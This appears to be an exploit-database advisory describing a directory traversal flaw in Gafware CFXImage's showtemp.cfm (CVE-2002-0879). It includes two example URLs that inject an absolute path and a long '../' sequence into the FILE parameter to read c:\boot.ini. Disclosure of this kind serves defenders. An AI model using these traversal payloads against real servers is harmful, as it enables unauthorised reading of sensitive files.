source: http://www.securityfocus.com/bid/4882/info Gafware's CFXImage is a custom tag for ColdFusion. A program included with the CFXImage documentation doesn't properly filter its input. It is reported that a flaw exists in this program that allows a malicious user to read files outside of the permitted directory structure. By using directory traversal sequences (i.e. '/../', '..') or specifying a filename, an attacker can obtain files that may contain potentially sensitive information. http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../../../../../../../../../../boot.ini This allows the attacker to view the contents of 'c:\boot.ini'.
Related ExploitsTrying to match CVEs (1): CVE-2002-0879
Trying to match OSVDBs (1): 13302
Other Possible E-DB Search Terms: Gafware CFXImage 1.6.4/1.6.6, Gafware CFXImage 1.6.4, Gafware CFXImage